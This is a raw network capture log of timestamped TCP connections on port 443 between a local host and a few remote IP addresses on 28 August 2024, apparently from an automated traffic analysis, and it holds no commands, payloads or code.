                                                          Aug 28, 2024 00:11:11.568124056 CEST44349839188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.568134069 CEST49839443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.584646940 CEST44349847188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.584743023 CEST44349847188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.584943056 CEST49847443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.586098909 CEST44349851188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.586141109 CEST44349851188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.586188078 CEST49851443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.586194038 CEST44349851188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.586236000 CEST44349851188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.586273909 CEST49847443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.586286068 CEST44349847188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.586296082 CEST49851443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.590342999 CEST49851443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.590349913 CEST44349851188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.620085001 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.620121956 CEST44349858188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.620214939 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.620553017 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.620569944 CEST44349858188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.648488998 CEST44349850188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.648534060 CEST44349850188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.648575068 CEST44349850188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.648602009 CEST49850443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.648618937 CEST44349850188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.648703098 CEST44349850188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.648771048 CEST49850443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.649544001 CEST49850443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.649560928 CEST44349850188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.652302980 CEST44349846188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.652367115 CEST44349846188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.658318043 CEST49846443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.661727905 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.661773920 CEST44349859188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.661875010 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.662393093 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662436962 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662467957 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662499905 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662507057 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.662514925 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662539959 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662544966 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.662580013 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.662585020 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662623882 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.662632942 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662640095 CEST44349859188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.662677050 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.663084984 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.663101912 CEST44349860188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.663228989 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.663659096 CEST49846443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.663666010 CEST44349846188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.664069891 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.664082050 CEST44349860188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.666836023 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.666840076 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.669107914 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.669116974 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.669287920 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.669689894 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.669703960 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.672688007 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.672696114 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.672756910 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.673223019 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.673232079 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.717094898 CEST44349848188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.717171907 CEST44349848188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.717212915 CEST49848443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.718266964 CEST49848443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.718275070 CEST44349848188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.720849037 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.720871925 CEST44349863188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.720926046 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.721268892 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.721281052 CEST44349863188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.723851919 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.723860025 CEST44349864188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.724040985 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.724273920 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.724286079 CEST44349864188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.747898102 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.748132944 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.748147964 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.749120951 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.749169111 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.749545097 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.749607086 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.749675989 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.749684095 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.799225092 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.882538080 CEST44349853188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.882663965 CEST44349852188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.882678986 CEST44349853188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.882719040 CEST44349852188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.882740974 CEST49853443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.882761002 CEST49852443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.882767916 CEST44349852188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.882807016 CEST49852443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.883241892 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.883332968 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.883403063 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.884648085 CEST49853443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.884660959 CEST44349853188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.884942055 CEST49852443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.884954929 CEST44349852188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.885190010 CEST49854443192.168.2.4104.26.1.100
                                                          Aug 28, 2024 00:11:11.885205984 CEST44349854104.26.1.100192.168.2.4
                                                          Aug 28, 2024 00:11:11.893480062 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.893512011 CEST44349865188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.893585920 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.893846989 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.893860102 CEST44349865188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.897964954 CEST44349855188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.898211002 CEST49855443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.898230076 CEST44349855188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.899255037 CEST44349855188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.899321079 CEST49855443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.899642944 CEST49855443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.899653912 CEST49855443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.899702072 CEST44349855188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.899728060 CEST49855443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.899749041 CEST49855443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.899957895 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.899977922 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.900068998 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.900602102 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:11.900614977 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.971045971 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.971349955 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:11.971371889 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.972428083 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.972491026 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:11.973572016 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:11.973639011 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:11.973836899 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:11.973845959 CEST44349857104.21.67.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.016225100 CEST49857443192.168.2.4104.21.67.3
                                                          Aug 28, 2024 00:11:12.074345112 CEST44349858188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.074676991 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.074702978 CEST44349858188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.075684071 CEST44349858188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.075733900 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.076556921 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.076571941 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.076617002 CEST44349858188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.076634884 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.076673031 CEST49858443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.076998949 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.077043056 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.077161074 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.077351093 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.077370882 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.126828909 CEST44349860188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.127033949 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.127047062 CEST44349860188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.128088951 CEST44349860188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.128153086 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.128516912 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.128580093 CEST44349860188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.128583908 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.128659010 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.128676891 CEST49860443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.129069090 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.129095078 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.129168034 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.129507065 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.129518986 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.137031078 CEST44349859188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.137406111 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.137428045 CEST44349859188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.138304949 CEST44349859188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.138359070 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139250040 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139264107 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139314890 CEST44349859188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.139389038 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139416933 CEST49859443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139667988 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139678955 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.139794111 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139962912 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.139974117 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.148439884 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.148721933 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.148732901 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.149729967 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.149782896 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150111914 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150171041 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.150188923 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150266886 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150266886 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150278091 CEST44349862188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.150317907 CEST49862443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150528908 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150548935 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.150733948 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150885105 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.150897980 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.177974939 CEST44349863188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.178155899 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.178167105 CEST44349863188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.179171085 CEST44349863188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.179244041 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.179511070 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.179549932 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.179572105 CEST44349863188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.179584026 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.179615974 CEST49863443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.179838896 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.179915905 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.180023909 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.180182934 CEST49872443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.180217981 CEST44349872188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.181664944 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.181854963 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.181869984 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.182826996 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.182883024 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.183173895 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.183234930 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.183317900 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.187175989 CEST44349864188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.187357903 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.187366962 CEST44349864188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.188322067 CEST44349864188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.188383102 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.188641071 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.188653946 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.188688040 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.188702106 CEST44349864188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.188775063 CEST49864443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.188894987 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.188920975 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.189026117 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.189177036 CEST49873443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.189193964 CEST44349873188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.224508047 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.226537943 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.226548910 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.266912937 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.352859020 CEST44349865188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.353137016 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.353152037 CEST44349865188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.354175091 CEST44349865188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.354231119 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.354676008 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.354690075 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.354746103 CEST44349865188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.354778051 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.354810953 CEST49865443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.355165958 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.355195999 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.355340004 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.355546951 CEST49874443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.355561972 CEST44349874188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.357848883 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.358040094 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.358047962 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.359460115 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.359528065 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.359958887 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.360039949 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.360126019 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.360132933 CEST44349866188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.406418085 CEST49866443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.433382034 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.435271025 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.435277939 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.435326099 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.435344934 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.435348034 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.435368061 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.435379982 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.435400963 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.435971975 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.436007977 CEST4434985665.9.86.56192.168.2.4
                                                          Aug 28, 2024 00:11:12.436069965 CEST49856443192.168.2.465.9.86.56
                                                          Aug 28, 2024 00:11:12.444941044 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.445863008 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.445882082 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.446852922 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.446919918 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.447571039 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.447590113 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.447637081 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.447638035 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.447792053 CEST44349861188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.447840929 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.447855949 CEST49861443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.448046923 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.448086023 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.448196888 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.448568106 CEST49875443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.448581934 CEST44349875188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.536336899 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.536603928 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.536627054 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.537635088 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.537697077 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.538001060 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.538063049 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.538156033 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.581286907 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.581296921 CEST44349868188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.602876902 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.603106022 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.603133917 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.604115963 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.604173899 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.604541063 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.604600906 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.604847908 CEST49870443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.604856968 CEST44349870188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.612765074 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.612961054 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.612972975 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.614018917 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.614074945 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.614439011 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.614506006 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.614586115 CEST49869443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.614590883 CEST44349869188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.623123884 CEST49868443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.625927925 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.626270056 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.626279116 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.627703905 CEST44349871188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:12.627770901 CEST49871443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:12.628079891 CEST49871443192.168.2.4188.114.96.3
